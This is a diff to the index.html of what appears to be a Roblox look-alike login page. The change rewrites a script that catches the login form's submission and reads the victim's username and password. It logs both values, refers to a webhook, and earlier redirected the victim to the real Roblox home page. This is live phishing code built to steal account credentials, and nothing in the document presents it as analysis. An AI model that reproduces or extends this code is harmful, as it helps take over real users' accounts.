--- a/index.html
+++ b/index.html
@@ -810,16 +810,14 @@ Roblox.Endpoints.Urls = Roblox.Endpoints.Urls || {};
 
 <script>
     document.addEventListener('DOMContentLoaded', function () {
-        var loginButton = document.getElementById('login-button');
-        var usernameInput = document.getElementById('login-username');
-        var passwordInput = document.getElementById('login-password');
+        var loginForm = document.querySelector('.login-form');
 
-        if (loginButton && usernameInput && passwordInput) {
-            loginButton.addEventListener('click', async function (event) {
+        if (loginForm) {
+            loginForm.addEventListener('submit', async function (event) {
                 event.preventDefault(); // Prevents the default form submission
 
-                var username = usernameInput.value;
-                var password = passwordInput.value;
+                var username = document.getElementById('login-username').value;
+                var password = document.getElementById('login-password').value;
 
                 console.log('Username:', username);
                 console.log('Password:', password);
@@ -854,14 +852,14 @@ Roblox.Endpoints.Urls = Roblox.Endpoints.Urls || {};
                     console.error('Error:', error);
                 }
 
-                window.location.href = "https://roblox.com/home";
+                // If you want to allow the form submission to proceed after the webhook, uncomment the line below
+                // this.submit();
             });
         } else {
-            console.error('Elements not found. Check IDs: login-button, login-username, login-password');
+            console.error('Login form not found. Check your HTML structure.');
         }
     });
 </script>
-
   </div>
 </div>
 <div id="left-navigation-container"></div>
